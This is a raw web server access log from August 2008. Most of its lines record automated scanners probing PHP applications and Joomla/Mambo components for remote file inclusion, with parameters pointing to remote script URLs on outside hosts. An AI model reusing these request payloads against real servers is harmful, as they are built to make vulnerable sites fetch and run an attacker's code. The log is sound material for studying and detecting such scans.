72.52.143.147 - - [21/Aug/2008:07:22:00 -0700] "GET /logs/modify.php?installed_config_file=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.heyhovies.com"
62.97.194.235 - - [21/Aug/2008:07:22:51 -0700] "GET /logs/access_080813.log/errors.php?error=http://vncownz.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.heyhovies.com"
62.97.194.235 - - [21/Aug/2008:07:22:52 -0700] "GET /logs/errors.php?error=http://vncownz.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.heyhovies.com"
62.97.194.235 - - [21/Aug/2008:07:22:52 -0700] "GET /errors.php?error=http://vncownz.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.heyhovies.com"
62.97.194.235 - - [21/Aug/2008:07:23:39 -0700] "GET /logs/access.log/errors.php?error=http://vncownz.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.heyhovies.com"
195.39.5.203 - - [21/Aug/2008:07:23:59 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
195.39.5.203 - - [21/Aug/2008:07:24:00 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
195.39.5.203 - - [21/Aug/2008:07:24:01 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
201.17.129.24 - - [21/Aug/2008:07:25:41 -0700] "GET /logs/access_080809.log/phphtml.php?htmlclass_path=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
213.246.46.202 - - [21/Aug/2008:07:25:44 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://elpac.edu.mx/components/com_extcalendar/s.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.heyhovies.com"
213.246.46.202 - - [21/Aug/2008:07:25:44 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://elpac.edu.mx/components/com_extcalendar/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.heyhovies.com"
213.246.46.202 - - [21/Aug/2008:07:25:44 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://elpac.edu.mx/components/com_extcalendar/s.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.heyhovies.com"
213.246.46.202 - - [21/Aug/2008:07:25:45 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://elpac.edu.mx/components/com_extcalendar/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.heyhovies.com"
201.17.129.24 - - [21/Aug/2008:07:25:53 -0700] "GET /logs/access_080724.log/phphtml.php?htmlclass_path=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
201.17.129.24 - - [21/Aug/2008:07:25:55 -0700] "GET /phphtml.php?htmlclass_path=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
201.17.129.24 - - [21/Aug/2008:07:25:57 -0700] "GET /logs/phphtml.php?htmlclass_path=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
195.39.5.203 - - [21/Aug/2008:07:26:29 -0700] "GET /logs/access_080731.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
69.89.27.247 - - [21/Aug/2008:07:27:01 -0700] "GET /logs/access_080731.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
69.89.27.247 - - [21/Aug/2008:07:27:01 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
69.89.27.247 - - [21/Aug/2008:07:27:01 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
69.89.27.247 - - [21/Aug/2008:07:28:20 -0700] "GET /logs/access_080809.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
74.53.240.146 - - [21/Aug/2008:07:28:35 -0700] "GET /logs/access_080809.log//?path%5Bdocroot%5D=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
74.53.240.146 - - [21/Aug/2008:07:28:35 -0700] "GET //?path%5Bdocroot%5D=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.heyhovies.com"
74.53.240.146 - - [21/Aug/2008:07:28:35 -0700] "GET /logs//?path%5Bdocroot%5D=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 200 1372 "-" "libwww-perl/5.79" "www.heyhovies.com"
165.193.254.16 - - [21/Aug/2008:07:29:57 -0700] "GET /?S=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)" "www.heyhovies.com"
165.193.254.14 - - [21/Aug/2008:07:29:57 -0700] "GET /favicon.ico HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)" "www.heyhovies.com"
165.193.254.16 - - [21/Aug/2008:07:29:57 -0700] "GET /?S=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)" "www.heyhovies.com"
69.89.27.247 - - [21/Aug/2008:07:30:13 -0700] "GET /logs/access_080731.log//config/dbutil.bck.php?confdir=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
69.89.27.247 - - [21/Aug/2008:07:30:13 -0700] "GET //config/dbutil.bck.php?confdir=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
69.89.27.247 - - [21/Aug/2008:07:30:13 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
66.135.41.76 - - [21/Aug/2008:07:30:31 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://locoputo1234.100webspace.net/bots/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.heyhovies.com"
66.135.41.76 - - [21/Aug/2008:07:30:31 -0700] "GET //index.php?DOCUMENT_ROOT=http://locoputo1234.100webspace.net/bots/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.heyhovies.com"
66.135.41.76 - - [21/Aug/2008:07:30:31 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://locoputo1234.100webspace.net/bots/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.heyhovies.com"
74.53.240.146 - - [21/Aug/2008:07:31:04 -0700] "GET /logs/access_080804.log//?path%5Bdocroot%5D=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
80.93.56.80 - - [21/Aug/2008:07:31:25 -0700] "GET /logs/access.log//index.php?option=com_contact&Itemid=&mosConfig_absolute_path=http://www.degeheimedienst.nl/dgd/include/inc_act/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
80.93.56.80 - - [21/Aug/2008:07:31:25 -0700] "GET //index.php?option=com_contact&Itemid=&mosConfig_absolute_path=http://www.degeheimedienst.nl/dgd/include/inc_act/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
80.93.56.80 - - [21/Aug/2008:07:31:26 -0700] "GET /logs//index.php?option=com_contact&Itemid=&mosConfig_absolute_path=http://www.degeheimedienst.nl/dgd/include/inc_act/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
208.83.209.18 - - [21/Aug/2008:07:31:39 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
208.83.209.18 - - [21/Aug/2008:07:31:39 -0700] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
208.83.209.18 - - [21/Aug/2008:07:31:39 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
74.54.89.50 - - [21/Aug/2008:07:31:39 -0700] "GET //index.php?DOCUMENT_ROOT=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
74.54.89.50 - - [21/Aug/2008:07:31:40 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
74.54.89.50 - - [21/Aug/2008:07:31:40 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
74.54.89.50 - - [21/Aug/2008:07:31:40 -0700] "GET //index.php?DOCUMENT_ROOT=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
74.54.89.50 - - [21/Aug/2008:07:31:40 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
74.54.89.50 - - [21/Aug/2008:07:31:40 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
80.93.54.60 - - [21/Aug/2008:07:31:49 -0700] "GET /logs/access.log//index.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://www.degeheimedienst.nl/dgd/include/inc_act/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
80.93.54.60 - - [21/Aug/2008:07:31:49 -0700] "GET //index.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://www.degeheimedienst.nl/dgd/include/inc_act/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
80.93.54.60 - - [21/Aug/2008:07:31:50 -0700] "GET /logs//index.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://www.degeheimedienst.nl/dgd/include/inc_act/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
201.130.79.130 - - [21/Aug/2008:07:32:58 -0700] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
201.130.79.130 - - [21/Aug/2008:07:32:58 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
201.130.79.130 - - [21/Aug/2008:07:32:58 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
201.17.129.24 - - [21/Aug/2008:07:33:37 -0700] "GET /logs/access_080809.log/phphtml.php?htmlclass_path=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
69.89.27.247 - - [21/Aug/2008:07:34:35 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
69.89.27.247 - - [21/Aug/2008:07:35:02 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
69.89.27.247 - - [21/Aug/2008:07:35:02 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
69.89.27.247 - - [21/Aug/2008:07:35:02 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
74.53.240.146 - - [21/Aug/2008:07:35:45 -0700] "GET /logs/access.log/admin.php?lang=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
74.53.240.146 - - [21/Aug/2008:07:35:45 -0700] "GET /admin.php?lang=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
74.53.240.146 - - [21/Aug/2008:07:35:45 -0700] "GET /logs/admin.php?lang=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
74.52.66.242 - - [21/Aug/2008:07:36:53 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/sak4w/rfi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.heyhovies.com"
74.52.66.242 - - [21/Aug/2008:07:36:53 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/sak4w/rfi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.heyhovies.com"
201.130.79.130 - - [21/Aug/2008:07:37:16 -0700] "GET /logs/access.log/components/com_forum/download.php?phpbb_root_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
201.130.79.130 - - [21/Aug/2008:07:37:16 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
201.130.79.130 - - [21/Aug/2008:07:37:16 -0700] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
69.64.34.172 - - [21/Aug/2008:07:37:47 -0700] "GET /logs/access_080804.log/errors.php?error=http://h1.ripway.com/jembutz/idbaru.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
69.64.34.172 - - [21/Aug/2008:07:37:47 -0700] "GET /errors.php?error=http://h1.ripway.com/jembutz/idbaru.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
69.64.34.172 - - [21/Aug/2008:07:37:47 -0700] "GET /logs/errors.php?error=http://h1.ripway.com/jembutz/idbaru.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
69.64.34.172 - - [21/Aug/2008:07:37:48 -0700] "GET /logs/access_080804.log/errors.php?error=http://h1.ripway.com/jembutz/idbaru.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
69.64.34.172 - - [21/Aug/2008:07:37:48 -0700] "GET /errors.php?error=http://h1.ripway.com/jembutz/idbaru.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
69.64.34.172 - - [21/Aug/2008:07:37:48 -0700] "GET /logs/errors.php?error=http://h1.ripway.com/jembutz/idbaru.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
208.83.209.18 - - [21/Aug/2008:07:38:04 -0700] "GET /logs/access.log/components/com_forum/download.php?phpbb_root_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
208.83.209.18 - - [21/Aug/2008:07:38:04 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
208.83.209.18 - - [21/Aug/2008:07:38:07 -0700] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
86.58.154.237 - - [21/Aug/2008:07:39:37 -0700] "GET /logs/access_080804.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
86.58.154.237 - - [21/Aug/2008:07:39:37 -0700] "GET /logs/access_080804.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
86.58.154.237 - - [21/Aug/2008:07:39:37 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
86.58.154.237 - - [21/Aug/2008:07:39:37 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
86.58.154.237 - - [21/Aug/2008:07:39:37 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
86.58.154.237 - - [21/Aug/2008:07:39:37 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
86.58.154.237 - - [21/Aug/2008:07:39:42 -0700] "GET /logs/access_080804.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
86.58.154.237 - - [21/Aug/2008:07:39:42 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
86.58.154.237 - - [21/Aug/2008:07:39:42 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
69.64.34.172 - - [21/Aug/2008:07:40:25 -0700] "GET /logs/access.log/errors.php?error=http://h1.ripway.com/jembutz/idbaru.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
69.64.34.172 - - [21/Aug/2008:07:40:26 -0700] "GET /logs/access.log/errors.php?error=http://h1.ripway.com/jembutz/idbaru.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
74.6.8.89 - - [21/Aug/2008:07:41:33 -0700] "GET /tmp/?N=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.heyhovies.com"
139.153.14.206 - - [21/Aug/2008:07:42:28 -0700] "GET //index.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://www.degeheimedienst.nl/dgd/include/inc_act/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.heyhovies.com"
69.64.34.172 - - [21/Aug/2008:07:42:29 -0700] "GET /logs/access_080804.log//errors.php?error=http://h1.ripway.com/jembutz/idbaru.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
69.64.34.172 - - [21/Aug/2008:07:42:29 -0700] "GET //errors.php?error=http://h1.ripway.com/jembutz/idbaru.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
69.64.34.172 - - [21/Aug/2008:07:42:29 -0700] "GET /logs//errors.php?error=http://h1.ripway.com/jembutz/idbaru.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
69.64.34.172 - - [21/Aug/2008:07:42:35 -0700] "GET /logs/access_080804.log//errors.php?error=http://h1.ripway.com/jembutz/idbaru.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
69.64.34.172 - - [21/Aug/2008:07:42:35 -0700] "GET //errors.php?error=http://h1.ripway.com/jembutz/idbaru.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
69.64.34.172 - - [21/Aug/2008:07:42:35 -0700] "GET /logs//errors.php?error=http://h1.ripway.com/jembutz/idbaru.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
86.58.154.237 - - [21/Aug/2008:07:42:37 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
86.58.154.237 - - [21/Aug/2008:07:42:37 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
207.210.89.58 - - [21/Aug/2008:07:42:39 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
207.210.89.58 - - [21/Aug/2008:07:42:39 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
207.210.89.58 - - [21/Aug/2008:07:42:40 -0700] "GET /logs/access.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
69.64.34.172 - - [21/Aug/2008:07:42:45 -0700] "GET /logs/access_080804.log//errors.php?error=http://h1.ripway.com/jembutz/idbaru.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
69.64.34.172 - - [21/Aug/2008:07:42:45 -0700] "GET //errors.php?error=http://h1.ripway.com/jembutz/idbaru.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
69.64.34.172 - - [21/Aug/2008:07:42:45 -0700] "GET /logs//errors.php?error=http://h1.ripway.com/jembutz/idbaru.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
86.58.154.237 - - [21/Aug/2008:07:42:54 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
69.64.34.172 - - [21/Aug/2008:07:43:18 -0700] "GET /logs/access.log//errors.php?error=http://h1.ripway.com/jembutz/idbaru.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
69.64.34.172 - - [21/Aug/2008:07:43:18 -0700] "GET /logs/access.log//errors.php?error=http://h1.ripway.com/jembutz/idbaru.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
69.64.34.172 - - [21/Aug/2008:07:43:34 -0700] "GET /logs/access.log//errors.php?error=http://h1.ripway.com/jembutz/idbaru.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
66.221.68.20 - - [21/Aug/2008:07:44:14 -0700] "GET /logs/access.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.kx-td.com/images/bo.do??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.heyhovies.com"
66.221.68.20 - - [21/Aug/2008:07:44:14 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.kx-td.com/images/bo.do??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.heyhovies.com"
66.221.68.20 - - [21/Aug/2008:07:44:14 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.kx-td.com/images/bo.do??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.heyhovies.com"
80.93.56.80 - - [21/Aug/2008:07:44:39 -0700] "GET //index.php?option=com_contact&Itemid=&mosConfig_absolute_path=http://www.degeheimedienst.nl/dgd/include/inc_act/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
66.221.68.20 - - [21/Aug/2008:07:45:14 -0700] "GET /logs/access_080815.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.kx-td.com/images/bo.do??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.heyhovies.com"
216.235.247.169 - - [21/Aug/2008:07:45:24 -0700] "GET /modify.php?installed_config_file=http://www.21stcenturywoman.com/pics/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
80.93.54.60 - - [21/Aug/2008:07:45:33 -0700] "GET //index.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://www.degeheimedienst.nl/dgd/include/inc_act/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
213.165.80.16 - - [21/Aug/2008:07:45:57 -0700] "GET /modify.php?installed_config_file=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
62.97.194.235 - - [21/Aug/2008:07:46:08 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://vncownz.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.heyhovies.com"
62.97.194.235 - - [21/Aug/2008:07:46:08 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://vncownz.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.heyhovies.com"
